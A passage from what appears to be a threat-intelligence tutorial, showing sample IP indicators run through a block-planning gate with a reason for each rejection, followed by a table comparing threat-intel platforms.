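     "sources": ["feodotracker", "otx"]},                                          # stale
    {"ip": "203.0.113.88", "confidence": 92, "first_seen": REFERENCE_TIME,
     "sources": ["otx"]},                                                          # single source
    {"ip": "203.0.113.99", "confidence": 60, "first_seen": REFERENCE_TIME,
     "sources": ["otx", "misp"]},                                                  # low confidence
    {"ip": "not.an.ip", "confidence": 99, "first_seen": REFERENCE_TIME,
     "sources": ["otx", "misp"]},                                                  # malformed feed line
]


def demo():
    return plan_blocks(SAMPLE_INDICATORS, REFERENCE_TIME)


if __name__ == "__main__":
    print(demo())
```

Only one of the seven constructed hits survives the gate. Every `skipped` entry carries its reason, which should be written to the incident record: an analyst who sees "allowlisted" next to a 99-confidence C2 hit on a CDN address knows to pivot to the URL or certificate rather than the IP.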
Threat Intelligence Platforms
| Platform | Type | Key Features | Cost |
|---|---|---|---|
| MISP | Open Source | IOC sharing, TAXII/STIX export, sharing communities | Free |
| OpenCTI | Open Source | Knowledge graph, MITRE ATT&CK data model | Free |
| Anomali | Commercial | ThreatStream, VM | $$$ |
| Recorded Future | Commercial | Real-time intelligence | $$$$ |
| Mandiant | Commercial | Expert-led intelligence | $$$$ |
| CrowdStrike | Commercial | Falcon Intelligence | $$$ |